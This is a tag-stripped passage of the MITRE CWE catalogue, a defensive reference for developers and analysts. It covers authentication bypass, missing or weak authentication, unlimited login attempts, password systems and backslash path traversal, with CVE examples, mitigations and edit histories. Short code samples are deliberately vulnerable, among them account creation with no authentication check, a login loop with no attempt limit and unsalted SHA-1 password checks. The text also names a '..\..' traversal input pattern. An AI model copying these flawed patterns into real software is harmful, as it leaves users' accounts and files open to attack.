CVE-2004-0261 - Web auth - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0261 - - - CVE-2002-1730 - Authentication bypass by setting certain cookies to "true". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1730 - - - CVE-2002-1734 - Authentication bypass by setting certain cookies to "true". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1734 - - - CVE-2002-2064 - Admin access by setting a cookie. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2064 - - - CVE-2002-2054 - Gain privileges by setting cookie. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2054 - - - CVE-2004-1611 - Product trusts authentication information in cookie. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1611 - - - CVE-2005-1708 - Authentication bypass by setting admin-testing variable to true. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1708 - - - CVE-2005-1787 - Bypass auth and gain privileges by setting a variable. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1787 - - - - - Authentication Bypass via Assumed-Immutable Data - - - A1 - Unvalidated Input - CWE More Specific - - - SEC02-J - Do not base security checks on untrusted sources - - - - - - - - - - - - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Demonstrative_Examples, Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The requirements for the software dictate the use of an established authentication algorithm, but the implementation of the algorithm is incorrect. - This incorrect implementation may allow authentication to be bypassed. - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - - - - - CVE-2003-0750 - Conditional should have been an 'or' not an 'and'. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0750 - - - - - Authentication Logic Error - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Authentication Logic Error - Improper Implementation of Authentication Algorithm - - - - The software implements an authentication technique, but it skips a step that weakens the technique. - Authentication techniques should follow the algorithms that define them exactly, otherwise authentication can be bypassed or more easily subjected to brute force attacks. - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Integrity - Confidentiality - Bypass Protection Mechanism - Gain Privileges or Assume Identity - Read Application Data - Execute Unauthorized Code or Commands - This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or allowing attackers to execute arbitrary code. - - - - - CVE-2004-2163 - Shared secret not verified in a RADIUS response packet, allowing authentication bypass by spoofing server replies. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2163 - - - - - Missing Critical Step in Authentication - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - - - - - CVE-2002-1374 - The provided password is only compared against the first character of the real password. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1374 - - - CVE-2000-0979 - The password is not properly checked, which allows remote attackers to bypass access controls by sending a 1-byte password that matches the first character of the real password. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0979 - - - CVE-2001-0088 - Chain: Forum software does not properly initialize an array, which inadvertently sets the password to a single character, allowing remote attackers to easily guess the password and gain administrative privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0088 - - - - - Authentication Bypass by Primary Weakness - - - - Most "authentication bypass" errors are resultant, not primary. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources. - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - High - - - Access Control - Other - Gain Privileges or Assume Identity - Other - Exposing critical functionality essentially provides an attacker with the privilege level of that functionality. The consequences will depend on the associated functionality, but they can range from reading or modifying sensitive data, access to administrative or other privileged functionality, or possibly even execution of arbitrary code. - - - - - Manual Analysis - - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - Specifically, manual static analysis is useful for evaluating the correctness of custom authentication mechanisms. - - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - Automated Static Analysis - - Automated static analysis is useful for detecting commonly-used idioms for authentication. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authentication libraries. - Generally, automated static analysis tools have difficulty detecting custom authentication schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an established identity; an automated technique that detects the absence of authentication may report false positives. - - Limited - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Host Application Interface Scanner - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Attack Modeling - - - - - High - - - - - Architecture and Design - - Divide the software into anonymous, normal, privileged, and administrative areas. Identify which of these areas require a proven user identity, and use a centralized authentication capability. - Identify all potential communication channels, or other means of interaction with the software, to ensure that all channels are appropriately protected. Developers sometimes perform authentication at the primary channel, but open up a secondary channel that is assumed to be private. For example, a login mechanism may be listening on one network port, but after successful authentication, it may open up a second port where it waits for the connection, but avoids authentication because it assumes that only the authenticated party will connect to the port. - In general, if the software or protocol allows a single session or user state to persist across multiple connections or channels, authentication and appropriate credential management need to be used throughout. - - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Architecture and Design - - Where possible, avoid implementing custom authentication routines and consider using authentication capabilities as provided by the surrounding framework, operating system, or environment. These may make it easier to provide a clear separation between authentication tasks and authorization tasks. - In environments such as the World Wide Web, the line between authentication and authorization is sometimes blurred. If custom authentication routines are required instead of those provided by the server, then these routines must be applied to every single page, since these pages could be requested directly. - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator [REF-45]. - - - - - - In the following Java example the method createBankAccount is used to create a BankAccount object for a bank management application. - - public BankAccount createBankAccount(String accountNumber, String accountType,String accountName, String accountSSN, double balance) { - - BankAccount account = new BankAccount();account.setAccountNumber(accountNumber);account.setAccountType(accountType);account.setAccountOwnerName(accountName);account.setAccountOwnerSSN(accountSSN);account.setBalance(balance); - return account; - } - - However, there is no authentication mechanism to ensure that the user creating this bank account object has the authority to create new bank accounts. Some authentication mechanisms should be used to verify that the user has the authority to create bank account objects. - The following Java code includes a boolean variable and method for authenticating a user. If the user has not been authenticated then the createBankAccount will not create the bank account object. - - private boolean isUserAuthentic = false; - - // authenticate user, - - - // if user is authenticated then set variable to true - - - // otherwise set variable to false - public boolean authenticateUser(String username, String password) {...} - public BankAccount createNewBankAccount(String accountNumber, String accountType,String accountName, String accountSSN, double balance) { - BankAccount account = null; - if (isUserAuthentic) {account = new BankAccount();account.setAccountNumber(accountNumber);account.setAccountType(accountType);account.setAccountOwnerName(accountName);account.setAccountOwnerSSN(accountSSN);account.setBalance(balance);}return account; - } - - - - - - CVE-2002-1810 - MFV. Access TFTP server without authentication and obtain configuration file with sensitive plaintext information. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1810 - - - CVE-2008-6827 - Agent software running at privileges does not authenticate incoming requests over an unprotected channel, allowing a Shatter" attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6827 - - - CVE-2004-0213 - Product enforces restrictions through a GUI but not through privileged APIs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0213 - - - CVE-2020-15483 - monitor device allows access to physical UART debug port without authentication - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15483 - - - - - No Authentication for Critical Function - - - SFP31 - Missing authentication - - - - - - - - - - - - - - - This is separate from "bypass" issues in which authentication exists, but is faulty. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-02-16 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples, Relationships - - No Authentication for Critical Function - - - - The software does not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame, making it more susceptible to brute force attacks. - - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - An attacker could perform an arbitrary number of authentication attempts using different passwords, and eventually gain access to the targeted account. - - - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - Cost effective for partial coverage: - - - Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria - - - - - High - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Fuzz Tester - Framework-based Fuzzer - - - Cost effective for partial coverage: - - - Forced Path Execution - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Configuration Checker - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - - Common protection mechanisms include: - - - Disconnecting the user after a small number of failed attempts - Implementing a timeout - Locking out a targeted account - Requiring a computational task on the user's part. - - - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - Consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator. [REF-45] - - - - - - In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts. The attacker targeted a member of Twitter's support team and was able to successfully guess the member's password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts. - - - - - - The following code, extracted from a servlet's doPost() method, performs an authentication lookup every time the servlet is invoked. - - String username = request.getParameter("username");String password = request.getParameter("password"); - int authResult = authenticateUser(username, password); - - However, the software makes no attempt to restrict excessive authentication attempts. - - - This code attempts to limit the number of login attempts by causing the process to sleep before completing the authentication. - - $username = $_POST['username'];$password = $_POST['password'];sleep(2000);$isAuthenticated = authenticateUser($username, $password); - - However, there is no limit on parallel connections, so this does not increase the amount of time an attacker needs to complete an attack. - - - In the following C/C++ example the validateUser method opens a socket connection, reads a username and password from the socket and attempts to authenticate the username and password. - - int validateUser(char *host, int port){ - int socket = openSocketConnection(host, port);if (socket < 0) {printf("Unable to open socket connection");return(FAIL);} - int isValidUser = 0;char username[USERNAME_SIZE];char password[PASSWORD_SIZE]; - while (isValidUser == 0) { - if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {isValidUser = AuthenticateUser(username, password);}} - }return(SUCCESS); - } - - The validateUser method will continuously check for a valid username and password without any restriction on the number of authentication attempts made. The method should limit the number of authentication attempts made to prevent brute force attacks as in the following example code. - - int validateUser(char *host, int port){ - ... - int count = 0;while ((isValidUser == 0) && (count < MAX_ATTEMPTS)) { - if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {isValidUser = AuthenticateUser(username, password);}}count++; - }if (isValidUser) {return(SUCCESS);}else {return(FAIL);} - } - - - - Consider this example from a - real-world attack against the iPhone - [REF-1218]. An attacker can use brute force - methods; each time there is a failed guess, the - attacker quickly cuts the power before the failed - entry is recorded, effectively bypassing the - intended limit on the number of failed - authentication attempts. Note that this attack - requires removal of the cell phone battery and - connecting directly to the phone's power source, - and the brute force attack is still - time-consuming. - - - - - CVE-1999-1152 - Product does not disconnect or timeout after multiple failed logins. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1152 - - - CVE-2001-1291 - Product does not disconnect or timeout after multiple failed logins. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1291 - - - CVE-2001-0395 - Product does not disconnect or timeout after multiple failed logins. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0395 - - - CVE-2001-1339 - Product does not disconnect or timeout after multiple failed logins. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1339 - - - CVE-2002-0628 - Product does not disconnect or timeout after multiple failed logins. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0628 - - - CVE-1999-1324 - User accounts not disabled when they exceed a threshold; possibly a resultant problem. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1324 - - - - - AUTHENT.MULTFAIL - Multiple Failed Authentication Attempts not Prevented - - - SFP34 - Unrestricted authentication - - - - - - - - - - - - - - - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - Multiple Failed Authentication Attempts not Prevented - Failure to Restrict Excessive Authentication Attempts - - - - The use of single-factor authentication can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme. - While the use of multiple authentication schemes is simply piling on more complexity on top of authentication, it is inestimably valuable to have such measures of redundancy. The use of weak, reused, and common passwords is rampant on the internet. Without the added protection of multiple authentication schemes, a single mistake can result in the compromise of an account. For this reason, if multiple schemes are possible and also easy to use, they should be implemented and required. - - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - High - - - Access Control - Bypass Protection Mechanism - If the secret in a single-factor authentication scheme gets compromised, full authentication is possible. - - - - - Architecture and Design - Use multiple independent authentication schemes, which ensures that -- if one of the methods is compromised -- the system itself is still likely safe from compromise. - - - - - In both of these examples, a user is logged in if their given password matches a stored password: - - unsigned char *check_passwd(char *plaintext) {ctext = simple_digest("sha1",plaintext,strlen(plaintext), ... ); - //Login if hash matches stored hash - if (equal(ctext, secret_password())) {login_user();}} - - - String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance("SHA");encer.update(plainTextIn);byte[] digest = password.digest(); - //Login if hash matches stored hash - if (equal(digest,secret_password())) {login_user();} - - This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user's password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759). - - - - - Using single-factor authentication - - - - - - - - - - - - - - - - - - - - - - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-02-16 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Using Single-factor Authentication - - - - The use of password systems as the primary means of authentication may be subject to several flaws or shortcomings, each reducing the effectiveness of the mechanism. - - - - - - - - - - Password systems are the simplest and most ubiquitous authentication mechanisms. However, they are subject to such well known attacks,and such frequent compromise that their use in the most simple implementation is not practical. - - - - Architecture and Design - - - High - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - A password authentication mechanism error will almost always result in attackers being authorized as valid users. - - - - - Architecture and Design - - In order to protect password systems from compromise, the following should be noted: - - - Passwords should be stored safely to prevent insider attack and to ensure that -- if a system is compromised -- the passwords are not retrievable. Due to password reuse, this information may be useful in the compromise of other systems these users work with. In order to protect these passwords, they should be stored encrypted, in a non-reversible state, such that the original text password cannot be extracted from the stored value. - Password aging should be strictly enforced to ensure that passwords do not remain unchanged for long periods of time. The longer a password remains in use, the higher the probability that it has been compromised. For this reason, passwords should require refreshing periodically, and users should be informed of the risk of passwords which remain in use for too long. - Password strength should be enforced intelligently. Rather than restrict passwords to specific content, or specific length, users should be encouraged to use upper and lower case letters, numbers, and symbols in their passwords. The system should also ensure that no passwords are derived from dictionary words. - - - - - - Architecture and Design - Use a zero-knowledge password protocol, such as SRP. - - - Architecture and Design - Ensure that passwords are stored safely and are not reversible. - - - Architecture and Design - Implement password aging functionality that requires passwords be changed after a certain point. - - - Architecture and Design - Use a mechanism for determining the strength of a password and notify the user of weak password use. - - - Architecture and Design - Inform the user of why password protections are in place, how they work to protect data integrity, and why it is important to heed their warnings. - - - - - In both of these examples, a user is logged in if their given password matches a stored password: - - unsigned char *check_passwd(char *plaintext) {ctext = simple_digest("sha1",plaintext,strlen(plaintext), ... ); - //Login if hash matches stored hash - if (equal(ctext, secret_password())) {login_user();}} - - - String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance("SHA");encer.update(plainTextIn);byte[] digest = password.digest(); - //Login if hash matches stored hash - if (equal(digest,secret_password())) {login_user();} - - This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user's password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759). - - - - - Using password systems - - - A3 - Broken Authentication and Session Management - CWE More Specific - - - - - - - - - - - - - - - - - - - - - - CLASP - 2006-07-19 - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Background_Details, Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Likelihood_of_Exploit - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Using Password Systems - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize 'dir\..\..\filename' (multiple internal backslash dot dot) sequences that can resolve to a location that is outside of that directory. - - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - The 'dir\..\..\filename' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only removes one "..\" sequence, so multiple "..\" can bypass that check. Alternately, this manipulation could be used to bypass a check for "..\" at the beginning of the pathname, moving up more than one directory level. - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-0160 - The administration function in Access Control Server allows remote attackers to read HTML, Java class, and image files outside the web root via a "..\.." sequence in the URL to port 2002. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0160 - - - - - 8 - 'directory\..\..\filename - - - SFP16 - Path Traversal - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-10 - fixed incorrect manipulation in name (desc was correct). - - - CWE Content Team - MITRE - 2008-10-14 - updated Applicable_Platforms, Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Directory Doubled Dot Dot Backslash - 'directory\..\..\filename' - Path Traversal: 'dir\..\filename' - - - - The software does not encrypt sensitive or critical information before storage or transmission. - The lack of proper data encryption passes up the guarantees of confidentiality, integrity, and accountability that properly implemented encryption conveys. - - - - - - - - - Architecture and Design - OMISSION: This 